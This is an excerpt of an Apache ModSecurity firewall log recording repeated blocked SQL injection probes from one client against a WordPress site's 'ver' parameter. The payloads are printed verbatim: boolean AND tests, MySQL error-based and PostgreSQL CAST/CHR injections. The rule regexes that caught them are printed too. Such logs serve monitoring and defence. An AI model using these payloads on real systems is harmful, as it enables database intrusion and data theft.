"(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 5595= found within ARGS:ver: 4.2.16') AND 5595=1085 AND ('IHeJ'='IHeJ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFgIxkekPtrPbqLNY4KgAAANE"] [Wed Jun 26 16:17:52.396023 2024] [:error] [pid 31245:tid 140055424419584] [client 141.98.81.52:34108] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 7313= found within ARGS:ver: 4.2.16') AND 7313=7313 AND ('wgAm'='wgAm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFgK57xDCgKzJ-zxAxhAAAAEQ"] [Wed Jun 26 16:17:52.636915 2024] [:error] [pid 31859:tid 140055457990400] [client 141.98.81.52:34110] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 5168= found within ARGS:ver: 4.2.16' AND 5168=6054 AND 'eEZg'='eEZg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFgIxkekPtrPbqLNY4KwAAAMA"] [Wed Jun 26 16:17:52.888855 2024] [:error] [pid 31859:tid 140055326750464] [client 141.98.81.52:34112] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 7313= found within ARGS:ver: 4.2.16' AND 7313=7313 AND 'mAaB'='mAaB"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFgIxkekPtrPbqLNY4LAAAAMc"] [Wed Jun 26 16:17:53.139569 2024] [:error] [pid 31859:tid 140055276394240] [client 141.98.81.52:34116] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 8970= found within ARGS:ver: 4.2.16%' AND 8970=3768 AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFgYxkekPtrPbqLNY4LgAAAM0"] [Wed Jun 26 16:17:53.374963 2024] [:error] [pid 31859:tid 140055432812288] [client 141.98.81.52:34118] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 7313= found within ARGS:ver: 4.2.16%' AND 7313=7313 AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFgYxkekPtrPbqLNY4LwAAAMM"] [Wed Jun 26 16:17:53.625056 2024] [:error] [pid 31859:tid 140055217645312] [client 141.98.81.52:34122] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 7036= found within ARGS:ver: 4.2.16 AND 7036=8983-- Qgjk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFgYxkekPtrPbqLNY4MAAAANQ"] [Wed Jun 26 16:17:53.887737 2024] [:error] [pid 31859:tid 140055234430720] [client 141.98.81.52:34124] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 7313= found within ARGS:ver: 4.2.16 AND 7313=7313-- TZuv"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFgYxkekPtrPbqLNY4MQAAANI"] [Wed Jun 26 16:17:54.130264 2024] [:error] [pid 31245:tid 140055318357760] [client 141.98.81.52:34128] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFgq57xDCgKzJ-zxAxhgAAAEg"] [Wed Jun 26 16:17:54.373319 2024] [:error] [pid 31244:tid 140055432812288] [client 141.98.81.52:34130] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFgubXXCyFmkhe1iNqQAAAAAM"] [Wed Jun 26 16:17:54.632845 2024] [:error] [pid 31244:tid 140055301572352] [client 141.98.81.52:34132] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x71766a7171 found within ARGS:ver: 4.2.16) AND (SELECT 5617 FROM(SELECT COUNT(*),CONCAT(0x71766a7171,(SELECT (ELT(5617=5617,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (4854=4854"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFgubXXCyFmkhe1iNqQQAAAAo"] [Wed Jun 26 16:17:54.877243 2024] [:error] [pid 31244:tid 140055276394240] [client 141.98.81.52:34134] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x71766a7171 found within ARGS:ver: 4.2.16 AND (SELECT 5617 FROM(SELECT COUNT(*),CONCAT(0x71766a7171,(SELECT (ELT(5617=5617,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFgubXXCyFmkhe1iNqQgAAAA0"] [Wed Jun 26 16:17:55.135010 2024] [:error] [pid 31859:tid 140055441204992] [client 141.98.81.52:34136] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x71766a7171 found within ARGS:ver: 4.2.16') AND (SELECT 5617 FROM(SELECT COUNT(*),CONCAT(0x71766a7171,(SELECT (ELT(5617=5617,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('JFHm'='JFHm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFg4xkekPtrPbqLNY4MgAAAMI"] [Wed Jun 26 16:17:55.381240 2024] [:error] [pid 31246:tid 140055242823424] [client 141.98.81.52:34138] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x71766a7171 found within ARGS:ver: 4.2.16' AND (SELECT 5617 FROM(SELECT COUNT(*),CONCAT(0x71766a7171,(SELECT (ELT(5617=5617,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pAHb'='pAHb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFg1xchXPGtOGw21Gp0AAAAJE"] [Wed Jun 26 16:17:56.331250 2024] [:error] [pid 31859:tid 140055259608832] [client 141.98.81.52:34140] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x71766a7171 found within ARGS:ver: 4.2.16%' AND (SELECT 5617 FROM(SELECT COUNT(*),CONCAT(0x71766a7171,(SELECT (ELT(5617=5617,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFhIxkekPtrPbqLNY4MwAAAM8"] [Wed Jun 26 16:17:56.580934 2024] [:error] [pid 31246:tid 140055318357760] [client 141.98.81.52:34142] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x71766a7171 found within ARGS:ver: 4.2.16 AND (SELECT 5617 FROM(SELECT COUNT(*),CONCAT(0x71766a7171,(SELECT (ELT(5617=5617,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- NyJS"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFhFxchXPGtOGw21Gp0QAAAIg"] [Wed Jun 26 16:17:56.831688 2024] [:error] [pid 31859:tid 140055449597696] [client 141.98.81.52:34144] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 4.2.16) AND 2944=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (2944=2944) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(106)||CHR(106)||CHR(113)) AS NUMERIC) AND (4835=4835"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFhIxkekPtrPbqLNY4NAAAAME"] [Wed Jun 26 16:17:57.075863 2024] [:error] [pid 31246:tid 140055309965056] [client 141.98.81.52:34146] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 4.2.16 AND 2944=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (2944=2944) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(106)||CHR(106)||CHR(113)) AS NUMERIC)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFhVxchXPGtOGw21Gp0gAAAIk"] [Wed Jun 26 16:17:57.327738 2024] [:error] [pid 31246:tid 140055268001536] [client 141.98.81.52:34148] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 4.2.16') AND 2944=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (2944=2944) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(106)||CHR(106)||CHR(113)) AS NUMERIC) AND ('yvLo'='yvLo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFhVxchXPGtOGw21Gp0wAAAI4"] [Wed Jun 26 16:17:57.566848 2024] [:error] [pid 31246:tid 140055276394240] [client 141.98.81.52:34150] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 4.2.16' AND 2944=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (2944=2944) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(106)||CHR(106)||CHR(113)) AS NUMERIC) AND 'ejln'='ejln"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFhVxchXPGtOGw21Gp1AAAAI0"] [Wed Jun 26 16:17:57.810531 2024] [:error] [pid 31246:tid 140055192467200] [client 141.98.81.52:34152] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 4.2.16%' AND 2944=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (2944=2944) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(106)||CHR(106)||CHR(113)) AS NUMERIC) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFhVxchXPGtOGw21Gp1QAAAJc"] [Wed Jun 26 16:17:58.058188 2024] [:error] [pid 31859:tid 140055416026880] [client 141.98.81.52:34154] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match 